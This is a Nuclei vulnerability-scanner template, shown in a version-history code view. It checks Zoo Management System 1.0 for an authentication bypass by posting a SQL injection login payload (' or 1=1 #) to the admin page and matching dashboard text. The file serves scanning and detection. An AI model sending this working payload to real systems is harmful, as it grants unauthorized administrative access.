nuclei-templates/vulnerabilities/other/zms-auth-bypass.yaml

36 lines
961 B
YAML
Raw Normal View History

2020-10-15 19:30:42 +00:00
id: zms-auth-bypass
info:
name: Zoo Management System 1.0 - Authentication Bypass
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/48880
2021-09-09 13:38:13 +00:00
tags: auth-bypass,zms
2020-10-15 19:30:42 +00:00
requests:
- raw:
- |
POST /zms/admin/index.php HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Origin: {{BaseURL}}
Referer: {{BaseURL}}/zms/admin/index.php
Cookie: PHPSESSID={{randstr}}
2020-10-15 19:30:42 +00:00
username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: regex
regex:
- "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)"
2020-10-15 19:32:52 +00:00
- "ZMS ADMIN"
2020-10-15 19:30:42 +00:00
condition: and
part: body
- type: status
status:
- 200